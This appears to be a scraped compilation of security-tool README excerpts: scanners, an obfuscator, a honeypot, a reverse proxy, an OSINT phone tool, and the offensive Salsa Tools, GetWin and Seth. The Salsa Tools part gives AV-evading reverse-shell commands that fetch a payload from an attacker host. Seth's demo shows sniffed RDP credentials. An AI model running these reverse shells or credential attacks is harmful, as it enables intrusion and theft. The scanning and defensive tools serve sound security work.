Yaazhini is a free vulnerability scanner for android APK and API. It is a user-friendly tool that you can easily scan any APK and API of android application and find the vulnerabilities. Yaazhini includes vulnerability scan of API, the vulnerability of APK and reporting section to generate a report.
System Requirements
Operating Systems Mac OSX(64bit), Windows(64bit & 32bit)
RAM Minimum Usage 4GB of available memory. 16GB required for larger Android Apps
Storage10GB of available disk space
Dependancy SoftwareJava 1.8+
Advantages of Yaazhini
Scan Android APK by just one click
Scan Android Application REST API (emulator, device)
Generate report
Free to use
Easy to use
How to use Yaazhini Android Application APK Scanner
Start the Yaazhini Application.
Provide the project name
Upload the APK file
Click on Upload & Scanbutton
After the scan gets completed we can see all detail of vulnerability and generate the report
Yaazhini – Android Application Rest API Scanner can help you to find the following attacks
SQL Injection
Command Injection
Header Injection
Cross-site Scripting ( possibilities )
Missing Security Headers
Sensitive Information Disclosure in Response Headers
Sensitive Information Disclosure in Error messages
Missing Server Side Input Validation
Unwanted Use of HTTP Methods
Improper HTTP Response and more
How to use Yaazhini Android Application Rest Scanner
Start Application.
Tests Mobile
Security Testing
Testing Tool
Command Line
Testing Suite
Device Or Emulator
Create a New Project.
Add the New Request in the Created Project.
Provide Proper Headers, URL, and Data.
Save and Run the Scan From the Menu Bar.
After Scan Gets Completed Click on Generate Report From the Menu Bar.
Sample Reports for Yaazhini
Yaazhini-Android APK Scanner Sample report starts with a quick summary of the findings and risk ratings. Each finding has a detailed explanation in terms of risk and recommendations about the vulnerability. The vulnerabilities are ordered by the risk level.
Yaazhini -Mobile Application Scanner Sample report Sample report starts with a quick summary of the findings and risk ratings. Each finding has a detailed explanation in terms of risk and recommendations about the vulnerability. The vulnerabilities are ordered by the risk level.
Takes a python source code and transform it into an obfuscated python code, replace name of variables - classes - functions to random chars and defined length, removes comments, line breaks and add to each line a random script with an always differents values.
Requirement
Python >= 3.5
Files supported
Files written in python 2.x and 3.x
Installation git clone https://github.com/Hnfull/Intensio-Obfuscator.git cd Intensio-Obfuscator/intensio/
Features
Feature
Description
Replace
Replace all names of variables - classes - functions defined and remove all line breaks
Padding
Add random scripts after each line and remove all line breaks
Remove
Remove all commentaries and all line breaks
Secret
Only for the curious :)
Mixer lower
Generate words with 32 chars that replace variables - classes - functions defined in source code and in random scripts if 'replace' or 'padding' features are specified
Mixer medium
Generate words with 64 chars that replace variables - classes - functions defined in source code and in random scripts if 'replace' or 'padding' features are specified
Mixer high
Generate words with 128 chars that replace variables - classes - functions defined in source code and in random scripts if 'replace' or 'padding' features are specified
Usages
-h, --help -> show this help message and exit. -f, --onefile -> if only one file. -d, --multiplefiles -> if multiple files (project). -i, --input -> source file or directory - if multiple files indicate a directory that contain all your files. -c, --code -> language used in input file or directory. value: [python] -o, --output -> output file or directory that will be obfuscated - if multiple file indicate a empty directory that will contain all your files. -m, --mixer -> length level of variables mix output. values: [lower,medium,high] -r, --replace -> activate the 'replace' obfuscation feature. -p, --padding -> activate the 'padding' obfuscation feature. -rm, --remove -> activate the 'remove' obfuscation f eature. -s, --secret -> activate the 'secret' bullshit feature.
If you want exclude python variables - classes - functions which will be taken by the 'replace' feature, edit intensio/exclude_python_words.txt
If you want to include python variables - classes - functions that are not included when launching the 'replace' feature, edit intensio/include_python_words.txt
Do not define identically your names of local variables - classes - functions to python keywords or names of functions - classes of imported python libraries !!
If it's one file only, the command is same that for multiple file, just do not pointed a directory but a python file directly for -i and -o parameters, then change -d parameter into -f parameter
Possible malfunctions
If a variable - class - function has an identical name with a word between ' ' or " " in print() function, your text will have the same value that the mixer variables - class - function.
If a variable - class - function has an identical name with a word in after # (commentary) your text will have the same value that the mixer variables - class - function, but if between """ or ''' without a variables before, no replacing is performed.
If you named your variables - classes - functions in the same way as python keywords or names of functions/class of imported python libraries, an error may appear. Edit intensio/excluded_python_words.txt to add the variables not to obfuscate or change your names of local variables - classes - fuctions, if your variables - classes - functions have the same name as a keyword it, he will be obfuscated and errors will appear.
Todo
Version 1.0.1-x:
Code optimization
Fix bugs and problems
Improved features already present
Version 1.1.0:
Support files written in C
Version 1.2.0:
Support files written in C++
Disclamer
Intensio-Obfuscator is for education/research purposes only. The author takes NO responsibility ay for how you choose to use any of the tools provided
PhoneInfoga is one of the most advanced tools to scan phone numbers using only free resources. The goal is to first gather standard information such as country, area, carrier and line type on any international phone numbers with very good accuracy. Then search for footprints on search engines to try to find the VoIP provider or identify the owner.
Features
Check if phone number exists and is possible
Gather standard information such as country, line type, and carrier
OSINT footprinting using external APIs, Google Hacking, phone books & search engines
Check for reputation reports, social media, disposable numbers and more
Scan several numbers at once
Use custom formatting for more effective OSINT reconnaissance
Salsa Tools is a collection of three different tools that combined, allows you to get a reverse shell on steroids in any Windows environment without even needing PowerShell for it's execution. In order to avoid the latest detection techniques (AMSI), most of the components were initially written on C#. Salsa Tools was publicly released by Luis Vacas during his Talk “Inmersión en la explotación tiene rima” which took place during h-c0n in 9th February 2019.
EvilSalsa is the key ingredient of this recipe. It contains the payload, which is executed on the system as it follows: as soon as the payloads starts, it runs System.Management.Automation.dll which creates a runspace . Within that runspace we have four types of shells (TCP / UDP / ICMP / DNS / BINDTCP). Once EvilSalsa is loaded, first thing first, the existence of c:\windows\system32\amsi.dll is checked. If it exists, it is patched using a home-cooked variant of CyberArk and Rastamouse bypasses.
Bringing the Encrypted EvilSalsa to the table with SalseoLoader SalseoLoader is in charge of loading the encrypted payload. Can be both compiled as a library or as an executable. If it is run as an executable, the chosen arguments must be provided when the executable is run. If it is compiled as a library, the descriptor "main" must be exported. Arguments are added using environmental variables.
Compiling the binaries Download the source code from the github and compile EvilSalsa and SalseoLoader. You will need Visual Studio installed to compile the code. Compile those projects for the architecture of the windows box where your are going to use them(If the Windows supports x64 compile them for that architectures). You can select the architecture inside Visual Studio in the left "Build" Tab in "Platform Target". (If you can't find this options press in "Project Tab" and then in " Properties")
Prepare the Backdoor First of all, you will need to encode the EvilSalsa.dll. To do so, you can use the python script encrypterassembly.py or you can compile the project EncrypterAssembly
Ok, now you have everything you need to execute all the Salseo thing: the encoded EvilDalsa.dll and the binary of SalseoLoader. Upload the SalseoLoader.exe binary to the machine. It shouldn't be detected by any AV...
Execute the backdoor
Getting a TCP reverse shell (downloading encoded dll through HTTP) Remember to start a nc as the reverse shell listener, and a HTTP server to serve the encoded evilsalsa. SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
Getting a UDP reverse shell (downloading encoded dll through SMB) Remember to start a nc as the reverse shell listener, and a SMB server to serve the encoded evilsalsa (impacket-smbserver). SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
Getting a TCP reverse shell SSL (using local file) Set the listener inside the attacker machine:
Getting a ICMP reverse shell (encoded dll already inside the victim) This time you need a special tool in the client to receive the reverse shell. Download: [https://github.com/inquisb/icmpsh] Disable ICMP Replies:
#You finish, you can enable it again running: sysctl -w net.ipv4.icmp_echo_ignore_all=0
Execute the client: python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>" Inside the victim, lets execute the salseo thing: SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
Compiling SalseoLoader as DLL exporting main function Open the SalseoLoader project using Visual Studio.
Add before the main function: [DllExport] Before the main function add this line: [DllExport]
Exit Visual Studio and execute DllExport_configure Just exit Visual Studio Then, go to your SalseoLoader folder and execute DllExport_Configure.bat Select x64 (if you are going to use it inside a x64 box, that was my case), select System.Runtime.InteropServices (inside Namespace for DllExport) and press Apply
To build the solution: Build --> Build Solution (Inside the Output console the path of the new DLL will appear)
Test the generated Dll Copy and paste the Dll where you want to test it. Execute: rundll32.exe SalseoLoader.dll,main If not error appears, probably you have a functional dll!!
Get a shell using the Dll Don't forget to use a HTTP server and set a nc listener
Powershell
#You finish, you can enable it again running: sysctl -w net.ipv4.icmp_echo_ignore_all=0
FLAGS: -f, --append-slash Tries to also append / to the base request -K, --exit-on-error Exits on connection errors -h, --help Prints help information -k, --ignore-certificate Disables TLS certificate validation --no-banner Skips initial banner --no-progress-bar Disables the progress bar -V, --version Prints version information -v, --verbose Sets the level of verbosity
OPTIONS: -d, --domain <domain> Uses the specified domain -e, --extensions <extensions> Sets the extensions [default: ] -b, --http-body <http-body> Uses the specified HTTP method [default: ] -H, --http-header <http-header>... Appends the specified HTTP header -X, --http-method <http-method> Uses the specified HTTP method [default: GET] -S, --ignore-status-codes <ignore-status-codes> Sets the list of status codes to ignore [default: 404] -x, --ignore-string <ignore-string>... Ignores results with specified string in vhost mode -s, --include-status-cod es <include-status-codes> Sets the list of status codes to include [default: ] -m, --mode <mode> Sets the mode of operation (dir, dns, fuzz) [default: dir] -o, --output <output> Saves the results in the specified file [default: ] -t, --threads <threads> Sets the amount of concurrent requests [default: 10] -u, --url <url> Sets the target URL -a, --user-agent <user-agent> Uses the specified User-Agent [default: rustbuster] -w, --wordlist <wordlist> Sets the wordlist
List all print() and NSLog() messages which have been written by developer in Xcode. (optional)
List of all the network requests sent by the application. (optional)
List crash errors. (optional)
Share network details via email or copy to clipboard when you are in the Network Details page.
Copy logs. (long press the text, then select all or select copy)
Search logs by keyword.
List application and device informations, including: version, build, bundle name, bundle id, screen resolution, device, iOS version
List all sandbox folders and files, supporting to preview and edit.
List HTML logs, including console.log(),console.debug(),console.warn(),console.error(),console. info(). (support both WKWebView and UIWebView). (optional)
Support JSON and Google's Protocol buffers
Installation
CocoaPods
platform :ios, '8.0' use_frameworks!
target 'YourTargetName' do pod 'CocoaDebug', :configurations => ['Debug'] end
Carthage
github "CocoaDebug/CocoaDebug"
WARNING: Don't submit .ipa to AppStore which has been linked with the CocoaDebug.framework. This Integration Guide outline a way to use build configurations to isolate linking the framework to Debug builds only.
FUD Win32payload generator and listener Legal disclaimer: Usage of GetWin for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
Features
FUD : Fully Undetectable
No Need configure port forwarding, or install others programs, using only ssh and serveo.net.
Usage:
git clone https://github.com/thelinuxchoice/getwin cd getwin bash getwin.sh
Seccubus automates regular vulnerability scans with various tools and aids security people in the fast analysis of its output, both on the first scan and on repeated scans.
On repeated scan delta reporting ensures that findings only need to be judged when they first appear in the scan results or when their output changes.
Seccubus 2.x is the only actively developed and maintained branch and all support for Seccubus V1 has officially been dropped.
Automated web security made simple Quarantyne is a reverse-proxy that protects web applications and APIs from fraudulent behavior, misuse, bots and cyber-attacks in real-time.
Requirements
Java 8
Presentation Quarantyne is a reverse-proxy written in java. It fronts a web application or API and protects it from fraudulent behavior, misuse, bots and cyber-attacks. It cannot stop them all, but it will definitely make it harder and more expensive to perform. It's like a firewall but smarter, because it does not just block traffic because the user-agent is not in a whitelist. Quarantyne also performs deep request inspection to detect if, for example, the password used has been compromised before, or if the email is disposable, with minimal configuration and no changes in your application. Our coverage section precisely lists what Quarantyne can identify.
Features
Wide coverage of common HTTP threats and misuse See coverage for a complete list of the threats and misuse Quarantyne can identify and stop.
Deep traffic analysis Quarantyne performs deep inspection of web traffic going to your application to verify that the data being sent is not compromised or junk.
Generic integration Quarantyne adds extra HTTP headers to the request it proxies to your service. For example, an HTTP request coming from AWS will bear the following headers:
Active protection Quarantyne can be configured to stop malicious requests from reaching your servers, avoiding wasting computing/DB/cache resources, metrics skew, junk data... See (Passive vs Active)[#passivevsactive].
Metrics & health reporting Quarantyne binds to an internal adminPort, where metrics (latencies, success rate...) as well as the health of the proxy are reported.
Privacy friendly / GDPR compliance Quarantyne is offline software. It runs inside your private network and does not communicate over the Internet with anyone to share data about your traffic, your business, or your users.
Ops Friendly. Single jar with 0 dependencies. Metrics are available on [proxyHost]:[adminPort]/metrics. Service health is available on [proxyHost]:[adminPort]/health
Coverage Quarantyne is able to detect the following threats and misuse.
Label
Definition
Behavior
Implemented
LBD
Large Body Data
Overload target's form processor with POST/PUT request with body > 1MB
yes
FAS
Fast Browsing
Request rate faster than regular human browsing
yes
CPW
Compromised Password
Password used is known from previous data breach. Possible account takeover
yes
DMX
Disposable Email
Email used is a disposable emails service
yes
IPR
IP Address Rotation
Same visitor is rotating its IP addresses
no
SHD
Suspicious Request Headers
Abnormal HTTP Request headers
yes
SUA
Suspicious User-Agent
User Agent not from a regular web browser
yes
PCX
Public Cloud Execution
IP address belongs to a public cloud service like AWS or GCP
no
IPD
IP/Country discrepancy
Country inferred from visitor IP is different from country field in submitted request
no
SGE
Suscpicious Geolocation
This request is not usually received from this geolocation. Possible account takeover.
no
Passive vs. Active
Passive mode Quarantyne lets you decide how you want to handle requests it flags. Quarantyne's default configuration is to NOT block tainted traffic. This traffic will make its way to your server and will be labelled as such via HTTP headers. Passive mode is the recommended way to get familiar with Quarantyne and to get a sense of what's going on inside your web traffic. In your application, log or plot the incoming Quarantyne labels and you might be surprised (or not) by what you find!
Active Mode In active mode, Quarantyne prevents tainted traffic from reaching your application. Blocking happens only you configure explicitely Quarantyne to do so. The configuration section explains how traffic blocking can be enabled.
Configuration Two complementary configuration systems are used: command-line arguments and an external (local or remote) JSON configuration file.
Command-line arguments Run the following command to display the help and what arguments are available
$ java -jar quarantyne -h Usage: <main class> [options] Options: --admin internal ip:port where to access admin, UI and metrics. Optional --config-file Optional URL or local path to a Quarantyne JSON configuration file --egress HTTP destination where Quarantyne forwards annotated web traffic. Default: http://httpbin.org --help, -help, --h, -h Display help about available configuration arguments Default: false --ingress ip:port of inbound web traffic. Default: 0.0.0.0:8080
The --config-file is an optional JSON configuration file that tells Quarantyne how requests to your service are structured. It enables deep traffic analysis and increase coverage.
Traffic config JSON file The traffic config file is optional and can either be an absolute local path or a remote HTTP(S) URL to a JSON file containing a single JSON object with the following structure. Describing the structure of your HTTP requests helps Quarantyne perform deep inspection of critical data such as password, emails or countries.
Quarantyne is able to parse payloads submitted via POST/PUT with a Content-Type of application/json or application/x-www-form-urlencoded. Root properties are optional.
Property
Definition
Notes
*_action
A POST/PUT data payload
login_action describes the data structure sent when logging in. register_action defines the data structure sent when registering / creating an account.
*_action.path
Path where data is submitted
Must start by /
*_action.identifier_param
Form/JSON key name where the user identifier is sent
*_action.secret_param
Form/JSON key where the user password is sent
email_param_keys
Form/JSON key where email addresses are sent
country_iso_code_param_keys
Form/JSON key where country iso codes are sent
blocked_request_page
HTTP response to return when blocking a request
It's better when this looks like a legit page/error as to not tip off the attack. Even better if you can inject fake data :)
blocked_classes
An array of attack classes to block.
[] is equivalent to passive mode. ['all'] stops every class of attack Quarantyne can detect. See coverage
Run the jar Quarantyne ships as a single 0-dependencies executable jar. Download a release and run:
$ java -jar quarantyne.jar
Build from source Clone this repo or and run the following
$ ./gradlew run
You should see the following:
"2018-11-28T22:25:17.152-0800" [main] INFO com.quarantyne.proxy.Main - 0.0.0.0:8080 <= quarantyne => http://httpbin.org:80 "2018-11-28T22:25:17.223-0800" [main] INFO com.quarantyne.proxy.Main - see available options with --help "2018-11-28T22:25:17.234-0800" [main] DEBUG com.quarantyne.proxy.Main - ==> event loop size is 8 "2018-11-28T22:25:17.234-0800" [main] DEBUG com.quarantyne.proxy.Main - ==> detected 4 cpus core "2018-11-28T22:25:17.496-0800" [main] INFO com.quarantyne.config.ConfigRetrieverOptionsSupplier - remote configuration file found at https://s3-us-west-2.amazonaws.com/releases.quarantyne.com/quarantyne.test.json
You are all set! By default, Quarantyne starts on 127.0.0.1:8080, and proxies traffic to http://httpbin.org. Send a few requests to http://127.0.0.1:8080/headers via various means. If fraudulent behavior is detected, you should see X-Quarantyne-Label HTTP headers in the request receive by your application. Hint: try with curl.
Prithvi is a report generation tool specially made for Security Assessment which is free to use and easy to use. It will generate high quality vulnerability assessment report for security controls. It got various features and majorly made for security assessment. You can easily find security vulnerabilities in a report.
System Requirements
Operating Systems Mac OSX(64bit), Windows(64bit & 32bit)
RAMMinimum Usage 4GB of available memory
Storage10GB of available disk space
Advantages of Prithvi
Prithvi is used to generate security assessments and could be modified based on your requirements. So can also be used for other report generation.
It includes the following features
We can add multiple projects and add vulnerabilities in each project.
We can add the number of occurrences with proof of concept.
To track the ongoing projects, we can also add tracking data for better understanding.
We can generate the project report as well as the tracking report.
Provided owasp data like vulnerabilities, details, and recommendations for vulnerabilities.
It has both OWASP web and mobile version data of OWASP 2017.
Prithvi is easy to use.
Prithvi is free to use.
Prithvi is available in Windows as well as the Mac version.
How to use Prithvi
Start the application.
Add new project and fill the details.
Add vulnerabilities in the project and fill the details.
Right click on your project in Prithvi, click on generate the report.
If you need a tracking report, click on the tracking tab.
Add tracking details and save it.
Now click the report in the menu and click generate tracking report in the submenu.
After clicking the tracking report provide the necessary details like project, date and click on the search button.
Then click generate the report in the right corner.
Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker. Kippo is inspired, but not based on Kojoney. Features Some interesting features:
Fake filesystem with the ability to add/remove files. A full fake filesystem resembling a Debian 5.0 installation is included
Possibility of adding fake file contents so the attacker can 'cat' files such as /etc/passwd. Only minimal file contents are included
Session logs stored in an UML Compatible format for easy replay with original timings
Just like Kojoney, Kippo saves files downloaded with wget for later inspection
An operating system (tested on Debian, CentOS, FreeBSD and Windows 7)
Python 2.5+
Twisted 8.0 to 15.1.0
PyCrypto
Zope Interface
See Wiki for some installation instructions.
How to run it? Edit kippo.cfg to your liking and start the honeypot by running: ./start.sh start.sh is a simple shell script that runs Kippo in the background using twistd. Detailed startup options can be given by running twistd manually. For example, to run Kippo in foreground: twistd -y kippo.tac -n By default Kippo listens for ssh connections on port 2222. You can change this, but do not change it to 22 as it requires root privileges. Use port forwarding instead. (More info: MakingKippoReachable). Files of interest:
dl/ - files downloaded with wget are stored here
log/kippo.log - log/debug output
log/tty/ - session logs
utils/playlog.py - utility to replay session logs
utils/createfs.py - used to create fs.pickle
fs.pickle - fake filesystem
honeyfs/ - file contents for the fake filesystem - feel free to copy a real system here
Multiple Methods (check GET,POST,PUT and DELETE for word entry): Note: Much web application if not make the request with right method return 404 code, this option test all methods
Seth is a tool written in Python and Bash to MitM RDP connections by attempting to downgrade the connection in order to extract clear text credentials. It was developed to raise awareness and educate about the importance of properly configured RDP connections in the context of pentests, workshops or talks. The author is Adrian Vollmer (SySS GmbH). Usage Run it like this:
Unless the RDP host is on the same subnet as the victim machine, the last IP address must be that of the gateway. The last parameter is optional. It can contain a command that is executed on the RDP host by simulating WIN+R via key press event injection. Keystroke injection depends on which keyboard layout the victim is using - currently it's only reliable with the English US layout. I suggest avoiding special characters by using powershell -enc <STRING>, where STRING is your UTF-16le and Base64 encoded command. However, calc should be pretty universal and gets the job done. The shell script performs ARP spoofing to gain a Man-in-the-Middle position and redirects the traffic such that it runs through an RDP proxy. The proxy can be called separately. This can be useful if you want use Seth in combination with Responder. Use Responder to gain a Man-in-the-Middle position and run Seth at the same time. Run seth.py -h for more information:
RDP credential sniffer -- Adrian Vollmer, SySS GmbH 2017
positional arguments: target_host target host of the RDP service target_port TCP port of the target RDP service (default 3389)
optional arguments: -h, --help show this help message and exit -d, --debug show debug information -f, --fake-server perform a 'fake server' attack -p LISTEN_PORT, --listen-port LISTEN_PORT TCP port to listen on (default 3389) -b BIND_IP, --bind-ip BIND_IP IP address to bind the fake service to (default all) -g {0,1,3,11}, --downgrade {0,1,3,11} downgrade the authentication protocol to this (default 3) -j INJECT, --inject INJECT command to execute via key press event injection -c CERTFILE, --certfile CERTFILE path to the certificate file -k KEYFILE, --keyfile KEYFILE path to the key file
For more information read the PDF in doc/paper (or read the code!). The paper also contains recommendations for counter measures. You can also watch a twenty minute presentation including a demo (starting at 14:00) on Youtube: https://www.youtube.com/watch?v=wdPkY7gykf4 Or watch just the demo (with subtitles) here: https://www.youtube.com/watch?v=JvvxTNrKV-s
Demo The following ouput shows the attacker's view. Seth sniffs an offline crackable hash as well as the clear text password. Here, NLA is not enforced and the victim ignored the certificate warning.
# ./seth.sh eth1 192.168.57.{103,2,102} ███████╗███████╗████████╗██╗ ██╗ ██╔════╝██╔════╝╚══██╔══╝██║ ██║ by Adrian Vollmer ███████╗█████╗ ██║ ███████║ seth@vollmer.syss.de ╚════██║██╔══╝ ██║ ██╔══██║ SySS GmbH, 2017 ███████║███████╗ ██║ ██║ ██║ https://www.syss.de ╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═╝ [*] Spoofing arp replies... [*] Turning on IP forwarding... [*] Set iptables rules for SYN packets... [*] Waiting for a SYN packet to the original destination... [+] Got it! Original destination is 192.168.57.102 [*] Clone the x509 certificate of the original destination... [*] Adjust the iptables rule for all packets... [*] Run RDP proxy... Listening for new connection Connection received from 192.168.57.103:50431 Downgradin g authentication options from 11 to 3 Enable SSL alice::avollmer-syss:1f20645749b0dfd5:b0d3d5f1642c05764ca28450f89d38db:0101000000000000b2720f48f5ded2012692fcdbf5c79a690000000002001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0001001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0004001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0003001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0007000800b2720f48f5ded20106000400020000000800300030000000000000000100000000200000413a2721a0d955c51a52d647289621706d6980bf83a5474c10d3ac02acb0105c0a0010000000000000000000000000000000000009002c005400450052004d005300520056002f003100390032002e003100360038002e00350037002e00310030003200000000000000000000000000 Tamper with NTLM response TLS alert access denied, Downgrading CredSSP Connection lost Connection received from 192.168.57.103:50409 Listening for new connection Enable SSL Connection lost Connection rece ived from 192.168.57.103:50410 Listening for new connection Enable SSL Hiding forged protocol request from client .\alice:ilovebob Keyboard Layout: 0x409 (English_United_States) Key press: LShift Key press: S Key release: S Key release: LShift Key press: E Key release: E Key press: C Key release: C Key press: R Key release: R Key press: E Key release: E Key press: T Key release: T Connection lost [*] Cleaning up... [*] Done.
Requirements
python3
tcpdump
arpspoof arpspoof is part of dsniff
openssl
Disclaimer Use at your own risk. Do not use without full consent of everyone involved. For educational purposes only.
This is a quick-and-dirty scanner for the CVE-2019-0708 vulnerability in Microsoft Remote Desktop. Right now, there are about 900,000 machines on the public Internet vulnerable to this vulnerability, so many are to expect a worm soon like WannaCry and notPetya. Therefore, scan your networks and patch (or at least, enable NLA) on vulnerable systems.
This is a command-line tool. You can download the source and compile it yourself, or you can download one of the pre-compiled binaries for Windows or macOS from the link above.
Primary use To scan a network, run it like the following:
rdpscan 192.168.1.1-192.168.1.255
This produces one of 3 results for each address:
SAFE - if target has determined bot be patched or at least require CredSSP/NLA
VULNERABLE - if the target has been confirmed to be vulnerable
UNKNOWN - if the target doesn't respond or has some protocol failure
When nothing exists at a target IP address, the older versions pritned the message "UNKNOWN - connection timed out". When scanning large networks, this produces an overload of too much information about systems you don't care about. Therefore, the new version by default doesn't produce this information unless you add -v (for verbose) on the command-line. You can increase the speed at which it scans large networks by increasing the number of workers:
rdpscan --workers 10000 10.0.0.0/8
However, on my computer, it only produces about 1500 workers, because of system limitations, no matter how high I configure this parameter. You can increase the speed even more by using this in conjunction with masscan, described in the second below.
Interpreting the results There are three general responses:
SAFE - which means the target is probably patched or otherwise not vulnerable to the bug.
VULNERABLE: which means we've confirmed the target is vulnerable to this bug, and that when the worm hits, will likely get infected.
UNKNOWN: means we can't confirm either way, usually because the target doesn't respond or isn't running RDP, which is the vast majority of responses. Also, when targets are out of resources or experiencing network problems, we'll get a lot of these. Finally, protocol errors are responsble for a lot. While the three main responses are SAFE, VULNERABLE, and UNKNOWN, they contain additional text explaining the diagnosis. This section describes the various strings you'll see.
SAFE There are three main reaons we think a target is safe:
SAFE - Target appears patched This happens when the target doesn't respond to the triggering request. This means it's a Windows system that's been patched, or a system that wasn't vulnerable to begin with, like Windows 10 or Unix.
SAFE - CredSSP/NLA required This means that the target first requires Network Level Authentication before the RDP connection can be established. The tool cannot pass this point, without leigitimate credentials, so cannot determine whether the target has been patched. However, hackers can't continue past this point to exploit vulnerable systems, either, so you are likely "safe". However, when exploits appear, insiders with valid usernames/passwords will be able to exploit the system if it's un-patched.
SAFE - not RDP This means the system is not RDP, but has some other service that happens to use this same port, and produces a response that's clearly not RDP. Common examples are HTTP and SSH. Note however that instead of an identifiable protocol, a server may respond with a RST or FIN packet. These are identified as UNKNOWN instead of SAFE/
VULNERABLE This means we've confirmed the system is vulnerable to the bug.
VULNERABLE - got appid There is only one response when the system is vulnerable, this one.
UNKNOWN There are a zillion variations for unknown
UNKNOWN - no connection - timeout This is by far the most common response, and happens when the target IP address makes no response whatsoever. In fact, it's so common that when scanning large ranges of addresses, it's usually ommited. You have to add the -v (verbose) flag in order to enable it.
UNKNOWN - no connection - refused (RST) This is by far the second most common response, and happens when the target exists and responds to network traffic, but isn't running RDP, so refuses the connection with a TCP RST packet.
UNKNOWN - RDP protocol error - receive timeout This is the third most common response, and happens when we've successfully established an RDP connection, but then the server stops responding to us. This is due to network errors and when the target system is overloaded for some reason. It could also be network errors on this end, such as when you are behind a NAT and overloading it with too many connections.
UNKNOWN - no connection - connection closed This means we've established a connection (TCP SYN-ACK), but then the connection is immediately closed (with a RST or FIN). There are many reasons this happen, which we cannot distinguish:
It's running RDP, but for some reason closes the connection, possibly because it's out-of-resources.
It's not RDP, and doesn't like the RDP request we send it, so instad of sending us a nice error message (which would trigger SAFE - not RDP), it abruptly closes the connection.
Some intervening device, like an IPS, firewall, or NAT closed the connection because it identified this as hostile, or ran out of resources.
Some other reason I haven't identified, there's a lot of weird stuff happening when I scan the Internet.
UNKNOWN - no connection - host unreachable (ICMP error) The remote network reports the host cannot be reached or is not running. Try again later if you think that host should be alive.
UNKNOWN - no connection - network unreachable (ICMP error) There is a (transient) network error on the far end, try again later if you believe that network should be running.
UNKNOWN - RDP protocol error This means some corruption happened in the RDP protocol, either because the remote side implents it wrong (not a Windows system), because it's handling a transient network error badly, or something else.
UNKNOWN - SSL protocol error Since Windows Vista, RDP uses the STARTTLS protocol to run over SSL. This layer has it's own problems like above, which includes handling underlying network errors badly, or trying to communicate with systems that have some sort of incompatibility. If you get a very long error message here (like SSL3_GET_RECORD:wrong version), it's because the other side has a bug in SSL, or your own SSL library that you are using has a bug.
Using with masscan This rdpscan tool is fairly slow, only scanning a few hundred targets per second. You can instead use masscan to speed things up. The masscan tool is roughly 1000 times faster, but only gives limited information on the target. The steps are:
First scan the address ranges with masscan to quickly find hosts that respond on port 3389 (or whatever port you use).
Second feed the output of masscan into rdpscan, so it only has to scan targets we know are active.
The simple way to run this is just to combine them on the command-line:
Building The difficult part is getting the OpenSSL libraries installed, and not conflicting with other versions on the system. Some examples for versions of Linux I've tested on are the following, but they keep changing package names from one distribution to the next. Also, there are many options for an OpenSSL-compatible API, such as BoringSSL and LibreSSL.
Once you've solved that problem, you just compile all the .c files together like this:
$ gcc *.c -lssl -lcrypto -o rdpscan
I've put a Makefile in the directory that does this, so you can likely do just:
$ make
The code is written in C, so needs a C compiler installed, such as doing the following:
$ sudo apt install build-essential
Common build errors This section describes the more obvious build errors.
ssl.h:24:25: fatal error: openssl/rc4.h: No such file or directory
This means you either don't have the OpensSSL headers installed, or they aren't in a path somewhere. Remember that even if you have OpenSSL binaries installed, this doesn't mean you've got the development stuff installed. You need both the headers and libraries installed. To install these things on Debian, do:
$ sudo apt install libssl-dev
To fix the path issue, add a compilation flag -I/usr/local/include, or something similar. An example linker problem is the following:
Undefined symbols for architecture x86_64: "_OPENSSL_init_ssl", referenced from: _tcp_tls_connect in tcp-fac73c.o "_RSA_get0_key", referenced from: _rdssl_rkey_get_exp_mod in ssl-d5fdf5.o "_SSL_CTX_set_options", referenced from: _tcp_tls_connect in tcp-fac73c.o "_X509_get_X509_PUBKEY", referenced from: _rdssl_cert_to_rkey in ssl-d5fdf5.o
I get this on macOS because there's multiple versions of OpenSSL. I fix this by hard-coding the paths:
According to comments by others, the following command-line might work on macOS if you've used Homebrew to install things. I still get the linking errors above, though, because I've installed other OpenSSL components that are conflicting.
Running The section above gives quickstart tips for running the program. This section gives more in-depth help. To scan a single target, just pass the address of the target:
./rdpscan 192.168.10.101
You can pass in IPv6 addresses and DNS names. You can pass in multiple targets. An example of this would be:
You can also scan ranges of addresses, using either begin-end IPv4 addresses, or IPv4 CIDR spec. IPv6 ranges aren't supported because they are so big.
./rdpscan 10.0.0.1-10.0.0.25 192.168.0.0/16
By default, it scans only 100 targets at a time. You can increase this number with the --workers parameter. However, no matter how high you set this parameter, in practice you'll get a max of around 500 to 1500 workers running at once, depending upon your system.
./rdpscan --workers 1000 10.0.0.0/24
Instead of specifying targets on the command-line, you can load them from a file instead, using the well-named --file parameter:
./rdpscan --file ips.txt
The format of the file is one address, name, or range per line. It can also consume the text generated by masscan. Extra whitespace is trimmed, blank lines ignored, any any comment lines are ignored. A comment is a line starting with the # character, or // characters. The output is sent to stdout giving the status of VULNERABLE, SAFE, or UNKNOWN. There could be additional reasons for each. These reasons are described above.
The parameter -dddd means diagnostic information, where the more ds you add, the more details are printed. This is sent to stderr instead of stdout so that you can separate the streams. Using bash this is done like this:
It makes connection problems worse so you get a lot more "UNKNOWN" results.
Statically link OpenSSL For releasing the Windows and macOS binaries attached as releases to this project I statically link OpenSSL, so that it doesn't need to be included separately, and the programs just work. This section describes some notes on how to do this, especially since the description on OpenSSL's own page seems to be out of date. Both these steps start with downloading the OpenSSL source and putting it next to the rdpscan directory:
git clone https://github.com/openssl/openssl
Windows For Windows, you need to first install some version of Perl. I use the one from ActiveState. Next, you'll need a special "assembler". I use the recommended one called NASM) Next, you'll need a compiler. I use VisualStudio 2010. You can download the latest "Visual Studio Community Edition" (which is 2019) instead from Microsoft. Now you need to build the makefile. This is done by going into the OpenSSL directory and running the Configure Perl program:
perl Configure VC-WIN32
